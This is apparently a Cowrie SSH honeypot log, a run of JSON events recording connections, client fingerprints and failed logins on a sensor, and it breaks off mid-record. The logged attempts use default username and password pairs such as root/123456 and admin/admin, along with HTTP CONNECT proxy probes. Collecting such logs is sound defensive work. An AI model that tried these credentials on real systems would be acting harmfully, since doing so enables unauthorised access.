{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":20812,"dst_ip":"1.2.3.4","dst_port":22,"session":"71ad2fa90c28","protocol":"ssh","message":"New connection: 204.76.203.28:20812 (1.2.3.4:22) [session: 71ad2fa90c28]","sensor":"my-vps","timestamp":"2025-08-28T07:55:30.658137Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T07:55:30.659145Z","src_ip":"204.76.203.28","session":"71ad2fa90c28"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T07:55:30.682432Z","src_ip":"204.76.203.28","session":"71ad2fa90c28"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:55:31.359574Z","src_ip":"204.76.203.28","session":"71ad2fa90c28"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:55:33.078725Z","src_ip":"204.76.203.28","session":"71ad2fa90c28"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":26436,"dst_ip":"1.2.3.4","dst_port":22,"session":"55573e08cdb7","protocol":"ssh","message":"New connection: 204.76.203.28:26436 (1.2.3.4:22) [session: 55573e08cdb7]","sensor":"my-vps","timestamp":"2025-08-28T07:55:41.314838Z"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:55:43.722713Z","src_ip":"204.76.203.28","session":"55573e08cdb7"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":36062,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7255cb72da6","protocol":"ssh","message":"New connection: 204.76.203.28:36062 (1.2.3.4:22) [session: e7255cb72da6]","sensor":"my-vps","timestamp":"2025-08-28T07:55:46.474074Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T07:55:47.867244Z","src_ip":"204.76.203.28","session":"e7255cb72da6"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:55:47.869160Z","src_ip":"204.76.203.28","session":"e7255cb72da6"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":36070,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d289787a693","protocol":"ssh","message":"New connection: 204.76.203.28:36070 (1.2.3.4:22) [session: 0d289787a693]","sensor":"my-vps","timestamp":"2025-08-28T07:55:51.483313Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T07:55:51.484104Z","src_ip":"204.76.203.28","session":"0d289787a693"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T07:55:51.503953Z","src_ip":"204.76.203.28","session":"0d289787a693"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T07:55:52.058452Z","src_ip":"204.76.203.28","session":"0d289787a693"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:55:53.539580Z","src_ip":"204.76.203.28","session":"0d289787a693"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":14936,"dst_ip":"1.2.3.4","dst_port":22,"session":"cccd13aaebe8","protocol":"ssh","message":"New connection: 204.76.203.28:14936 (1.2.3.4:22) [session: cccd13aaebe8]","sensor":"my-vps","timestamp":"2025-08-28T07:55:57.654073Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T07:55:57.655537Z","src_ip":"204.76.203.28","session":"cccd13aaebe8"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T07:55:57.675619Z","src_ip":"204.76.203.28","session":"cccd13aaebe8"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T07:55:58.256937Z","src_ip":"204.76.203.28","session":"cccd13aaebe8"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:55:59.724026Z","src_ip":"204.76.203.28","session":"cccd13aaebe8"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":14952,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e401f30ec8d","protocol":"ssh","message":"New connection: 204.76.203.28:14952 (1.2.3.4:22) [session: 4e401f30ec8d]","sensor":"my-vps","timestamp":"2025-08-28T07:56:02.363888Z"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:03.450100Z","src_ip":"204.76.203.28","session":"4e401f30ec8d"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":60130,"dst_ip":"1.2.3.4","dst_port":22,"session":"231d9b6447e0","protocol":"ssh","message":"New connection: 204.76.203.28:60130 (1.2.3.4:22) [session: 231d9b6447e0]","sensor":"my-vps","timestamp":"2025-08-28T07:56:04.814157Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T07:56:05.557596Z","src_ip":"204.76.203.28","session":"231d9b6447e0"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:05.559294Z","src_ip":"204.76.203.28","session":"231d9b6447e0"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":60146,"dst_ip":"1.2.3.4","dst_port":22,"session":"9aa56991299a","protocol":"ssh","message":"New connection: 204.76.203.28:60146 (1.2.3.4:22) [session: 9aa56991299a]","sensor":"my-vps","timestamp":"2025-08-28T07:56:07.509647Z"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:09.070536Z","src_ip":"204.76.203.28","session":"9aa56991299a"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":60152,"dst_ip":"1.2.3.4","dst_port":22,"session":"97b31f9b76ed","protocol":"ssh","message":"New connection: 204.76.203.28:60152 (1.2.3.4:22) [session: 97b31f9b76ed]","sensor":"my-vps","timestamp":"2025-08-28T07:56:10.925862Z"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:12.260365Z","src_ip":"204.76.203.28","session":"97b31f9b76ed"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62262,"dst_ip":"1.2.3.4","dst_port":22,"session":"a28143deaca5","protocol":"ssh","message":"New connection: 217.72.205.35:62262 (1.2.3.4:22) [session: a28143deaca5]","sensor":"my-vps","timestamp":"2025-08-28T07:56:16.347016Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:16.348181Z","src_ip":"217.72.205.35","session":"a28143deaca5"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":53198,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fdc36b69c8f","protocol":"ssh","message":"New connection: 204.76.203.28:53198 (1.2.3.4:22) [session: 6fdc36b69c8f]","sensor":"my-vps","timestamp":"2025-08-28T07:56:22.168245Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T07:56:22.168973Z","src_ip":"204.76.203.28","session":"6fdc36b69c8f"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 4ed0d5b0dc3be39c7f96ba3a3cc77895","sensor":"my-vps","timestamp":"2025-08-28T07:56:22.189163Z","src_ip":"204.76.203.28","session":"6fdc36b69c8f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T07:56:22.910225Z","src_ip":"204.76.203.28","session":"6fdc36b69c8f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:24.463272Z","src_ip":"204.76.203.28","session":"6fdc36b69c8f"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":13000,"dst_ip":"1.2.3.4","dst_port":22,"session":"9577935ecb82","protocol":"ssh","message":"New connection: 204.76.203.28:13000 (1.2.3.4:22) [session: 9577935ecb82]","sensor":"my-vps","timestamp":"2025-08-28T07:56:27.514020Z"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:28.458994Z","src_ip":"204.76.203.28","session":"9577935ecb82"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":13020,"dst_ip":"1.2.3.4","dst_port":22,"session":"d606fb32feba","protocol":"ssh","message":"New connection: 204.76.203.28:13020 (1.2.3.4:22) [session: d606fb32feba]","sensor":"my-vps","timestamp":"2025-08-28T07:56:29.797309Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T07:56:30.481895Z","src_ip":"204.76.203.28","session":"d606fb32feba"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:30.483105Z","src_ip":"204.76.203.28","session":"d606fb32feba"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":13028,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c2aa68af37c","protocol":"ssh","message":"New connection: 204.76.203.28:13028 (1.2.3.4:22) [session: 8c2aa68af37c]","sensor":"my-vps","timestamp":"2025-08-28T07:56:32.286216Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T07:56:33.152338Z","src_ip":"204.76.203.28","session":"8c2aa68af37c"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:33.154506Z","src_ip":"204.76.203.28","session":"8c2aa68af37c"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":11282,"dst_ip":"1.2.3.4","dst_port":22,"session":"112cbbb6bfc0","protocol":"ssh","message":"New connection: 204.76.203.28:11282 (1.2.3.4:22) [session: 112cbbb6bfc0]","sensor":"my-vps","timestamp":"2025-08-28T07:56:34.900006Z"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:35.651573Z","src_ip":"204.76.203.28","session":"112cbbb6bfc0"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":11296,"dst_ip":"1.2.3.4","dst_port":22,"session":"27482962c62d","protocol":"ssh","message":"New connection: 204.76.203.28:11296 (1.2.3.4:22) [session: 27482962c62d]","sensor":"my-vps","timestamp":"2025-08-28T07:56:36.351247Z"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:36.794900Z","src_ip":"204.76.203.28","session":"27482962c62d"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":11310,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e3cc0279b28","protocol":"ssh","message":"New connection: 204.76.203.28:11310 (1.2.3.4:22) [session: 1e3cc0279b28]","sensor":"my-vps","timestamp":"2025-08-28T07:56:37.036921Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T07:56:37.408115Z","src_ip":"204.76.203.28","session":"1e3cc0279b28"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:37.409372Z","src_ip":"204.76.203.28","session":"1e3cc0279b28"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38788,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3f21a90c680","protocol":"ssh","message":"New connection: 196.251.86.249:38788 (1.2.3.4:22) [session: a3f21a90c680]","sensor":"my-vps","timestamp":"2025-08-28T07:56:40.537090Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:40.554515Z","src_ip":"196.251.86.249","session":"a3f21a90c680"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":11316,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c5acdc6323c","protocol":"ssh","message":"New connection: 204.76.203.28:11316 (1.2.3.4:22) [session: 7c5acdc6323c]","sensor":"my-vps","timestamp":"2025-08-28T07:56:42.945400Z"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:43.577565Z","src_ip":"204.76.203.28","session":"7c5acdc6323c"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":49592,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ec085304701","protocol":"ssh","message":"New connection: 204.76.203.28:49592 (1.2.3.4:22) [session: 8ec085304701]","sensor":"my-vps","timestamp":"2025-08-28T07:56:45.241401Z"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:46.026296Z","src_ip":"204.76.203.28","session":"8ec085304701"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":49600,"dst_ip":"1.2.3.4","dst_port":22,"session":"1db1d09719be","protocol":"ssh","message":"New connection: 204.76.203.28:49600 (1.2.3.4:22) [session: 1db1d09719be]","sensor":"my-vps","timestamp":"2025-08-28T07:56:46.869843Z"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:47.546587Z","src_ip":"204.76.203.28","session":"1db1d09719be"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":49616,"dst_ip":"1.2.3.4","dst_port":22,"session":"966c9026fd6a","protocol":"ssh","message":"New connection: 204.76.203.28:49616 (1.2.3.4:22) [session: 966c9026fd6a]","sensor":"my-vps","timestamp":"2025-08-28T07:56:48.591515Z"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:49.048671Z","src_ip":"204.76.203.28","session":"966c9026fd6a"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":49628,"dst_ip":"1.2.3.4","dst_port":22,"session":"c794dd6175ae","protocol":"ssh","message":"New connection: 204.76.203.28:49628 (1.2.3.4:22) [session: c794dd6175ae]","sensor":"my-vps","timestamp":"2025-08-28T07:56:50.043415Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T07:56:50.332098Z","src_ip":"204.76.203.28","session":"c794dd6175ae"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:50.334000Z","src_ip":"204.76.203.28","session":"c794dd6175ae"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":49632,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5bceffe49db","protocol":"ssh","message":"New connection: 204.76.203.28:49632 (1.2.3.4:22) [session: d5bceffe49db]","sensor":"my-vps","timestamp":"2025-08-28T07:56:51.133440Z"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:51.560607Z","src_ip":"204.76.203.28","session":"d5bceffe49db"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":49634,"dst_ip":"1.2.3.4","dst_port":22,"session":"0600201b5396","protocol":"ssh","message":"New connection: 204.76.203.28:49634 (1.2.3.4:22) [session: 0600201b5396]","sensor":"my-vps","timestamp":"2025-08-28T07:56:52.964388Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 204.76.203.28:80 HTTP/1.0","message":"Remote SSH version: CONNECT 204.76.203.28:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-28T07:56:53.356338Z","src_ip":"204.76.203.28","session":"0600201b5396"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:53.357531Z","src_ip":"204.76.203.28","session":"0600201b5396"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":57826,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dfdcaf28ff1","protocol":"ssh","message":"New connection: 204.76.203.28:57826 (1.2.3.4:22) [session: 0dfdcaf28ff1]","sensor":"my-vps","timestamp":"2025-08-28T07:56:54.218813Z"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:54.797962Z","src_ip":"204.76.203.28","session":"0dfdcaf28ff1"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":57842,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e6c7aa35fe8","protocol":"ssh","message":"New connection: 204.76.203.28:57842 (1.2.3.4:22) [session: 8e6c7aa35fe8]","sensor":"my-vps","timestamp":"2025-08-28T07:56:55.680274Z"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:56.205341Z","src_ip":"204.76.203.28","session":"8e6c7aa35fe8"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":57858,"dst_ip":"1.2.3.4","dst_port":22,"session":"d01ba9dee6de","protocol":"ssh","message":"New connection: 204.76.203.28:57858 (1.2.3.4:22) [session: d01ba9dee6de]","sensor":"my-vps","timestamp":"2025-08-28T07:56:57.457113Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:56:57.753368Z","src_ip":"204.76.203.28","session":"d01ba9dee6de"}
{"eventid":"cowrie.session.connect","src_ip":"204.76.203.28","src_port":57872,"dst_ip":"1.2.3.4","dst_port":22,"session":"56db97ed9c55","protocol":"ssh","message":"New connection: 204.76.203.28:57872 (1.2.3.4:22) [session: 56db97ed9c55]","sensor":"my-vps","timestamp":"2025-08-28T07:56:58.893571Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.2","message":"Remote SSH version: SSH-2.0-libssh_0.11.2","sensor":"my-vps","timestamp":"2025-08-28T07:56:58.895226Z","src_ip":"204.76.203.28","session":"56db97ed9c55"}
{"eventid":"cowrie.client.kex","hassh":"4ed0d5b0dc3be39c7f96ba3a3cc77895","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,3des-cbc,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","3des-cbc","aes128-cbc","aes192-